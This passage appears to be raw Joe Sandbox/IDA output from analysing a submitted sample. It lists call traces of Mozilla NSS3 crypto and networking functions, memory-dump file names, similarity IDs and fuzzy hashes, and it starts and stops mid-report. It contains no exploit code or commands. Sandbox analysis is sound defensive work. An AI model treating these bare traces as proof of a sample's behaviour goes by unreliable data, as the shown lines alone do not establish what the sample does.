                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C538F2B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C538F53
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C538F65
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C538FA1
                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C538FFE
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C539012
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C539024
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C53902C
                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C53903E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitProcessstrtok_s
                                                                                                                                                                                          • String ID: block
                                                                                                                                                                                          • API String ID: 3407564107-2199623458
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C5FCC7B), ref: 6C5FCD7A
                                                                                                                                                                                            • Part of subcall function 6C5FCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C56C1A8,?), ref: 6C5FCE92
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCDA5
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCDB8
                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C5FCDDB
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCD8E
                                                                                                                                                                                            • Part of subcall function 6C5205C0: PR_EnterMonitor.NSS3 ref: 6C5205D1
                                                                                                                                                                                            • Part of subcall function 6C5205C0: PR_ExitMonitor.NSS3 ref: 6C5205EA
                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C5FCDE8
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C5FCDFF
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C5FCE16
                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C5FCE29
                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C5FCE48
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,Zl), ref: 6C5A0C81
                                                                                                                                                                                            • Part of subcall function 6C58BE30: SECOID_FindOID_Util.NSS3(6C54311B,00000000,?,6C54311B,?), ref: 6C58BE44
                                                                                                                                                                                            • Part of subcall function 6C578500: SECOID_GetAlgorithmTag_Util.NSS3(6C5795DC,00000000,00000000,00000000,?,6C5795DC,00000000,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C578517
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0CC4
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5A0CD5
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C5A0D1D
                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C5A0D3B
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C5A0D7D
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5A0DB5
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0DC1
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5A0DF7
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A0E05
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5A0E0F
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C5795E0
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C557F4A,00000000,?,00000000,00000000), ref: 6C5795F5
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C579609
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C57961D
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetInternalSlot.NSS3 ref: 6C57970B
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C579756
                                                                                                                                                                                            • Part of subcall function 6C5795C0: PK11_GetIVLength.NSS3(?), ref: 6C579767
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C57977E
                                                                                                                                                                                            • Part of subcall function 6C5795C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C57978E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                          • String ID: *,Zl$*,Zl$-$Zl
                                                                                                                                                                                          • API String ID: 3136566230-830518008
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C661DE0,?), ref: 6C596CFE
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C596D26
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C596D70
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C596D82
                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C596DA2
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C596DD8
                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C596E60
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C596F19
                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C596F2D
                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C596F7B
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C597011
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C597033
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C59703F
                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C597060
                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C597087
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C5970AF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF25
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF39
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF51
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55AF69
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55B06B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C55B083
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C55B0A4
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55B0C1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C55B0D9
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C55B102
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C55B151
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C55B182
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C55B177
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1A2
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1AA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C53AB95,00000000,?,00000000,00000000,00000000), ref: 6C55B1C2
                                                                                                                                                                                            • Part of subcall function 6C581560: TlsGetValue.KERNEL32(00000000,?,6C550844,?), ref: 6C58157A
                                                                                                                                                                                            • Part of subcall function 6C581560: EnterCriticalSection.KERNEL32(?,?,?,6C550844,?), ref: 6C58158F
                                                                                                                                                                                            • Part of subcall function 6C581560: PR_Unlock.NSS3(?,?,?,?,6C550844,?), ref: 6C5815B2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?Ul,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C62
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C76
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C86
                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552C93
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552CC6
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23,?), ref: 6C552CDA
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?,?,6C553F23), ref: 6C552CEA
                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?), ref: 6C552CF7
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C54E477,?,?,?,00000001,00000000,?), ref: 6C552D4D
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C552D61
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C552D71
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552D7E
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                          • String ID: #?Ul
                                                                                                                                                                                          • API String ID: 2446853827-1060960515
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AADB1
                                                                                                                                                                                            • Part of subcall function 6C58BE30: SECOID_FindOID_Util.NSS3(6C54311B,00000000,?,6C54311B,?), ref: 6C58BE44
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5AADF4
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5AAE08
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5AAE25
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C5AAE63
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C5AAE4D
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AAE93
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C5AAECC
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C5AAEDE
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C5AAEE6
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5AAEF5
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C5AAF16
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                          • Opcode ID: 058cd1636064a35547129e39a8a8fbf248e80666b71acd8892c0109f2a9daca7
                                                                                                                                                                                          • Instruction ID: b43be75135c9dabe1ef37087365ab42a3f55bbc4c4e03573238559cca8262a0e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 058cd1636064a35547129e39a8a8fbf248e80666b71acd8892c0109f2a9daca7
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5412BB6804210A7E7209AA6DC85BBF32A89F8671CF100525E81496F41FB35990ECEE7
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C548E22
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C548E36
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548E4F
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C548E78
                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C548E9B
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C548EAC
                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C548EDE
                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C548EF0
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F00
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C548F0E
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C548F39
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F4A
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C548F5B
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C548F72
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C548F82
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1569127702-0
                                                                                                                                                                                          • Opcode ID: 1000015ca5aa619d1f335bbf251d275cdc0faff09341b08ce3a3f3b954c77bc9
                                                                                                                                                                                          • Instruction ID: 18f743ea118703c86e8e68b43e749cda64c48e69c921f64ccb82040467444764
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1000015ca5aa619d1f335bbf251d275cdc0faff09341b08ce3a3f3b954c77bc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: E051D1B2E00211AFEB00DF68CC8496AB7B9EF45358B15C52AEC08DB700E731ED4587E6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C57EE0B
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57EEE1
                                                                                                                                                                                            • Part of subcall function 6C571D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C571D7E
                                                                                                                                                                                            • Part of subcall function 6C571D50: EnterCriticalSection.KERNEL32(?), ref: 6C571D8E
                                                                                                                                                                                            • Part of subcall function 6C571D50: PR_Unlock.NSS3(?), ref: 6C571DD3
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57EE51
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C57EE65
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57EEA2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EEBB
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57EED0
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57EF48
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EF68
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57EF7D
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C57EFA4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57EFDA
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C57F055
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C57F060
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                          • Opcode ID: d12dfc787c7128f3bd2eae732b9ace61f4bb9312e0af2c8b45c8357f69974983
                                                                                                                                                                                          • Instruction ID: d1367e2ed2ee84ed07922c0d3c22a2b5ee5c0c4378788d1ca1b525a91212fc3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: d12dfc787c7128f3bd2eae732b9ace61f4bb9312e0af2c8b45c8357f69974983
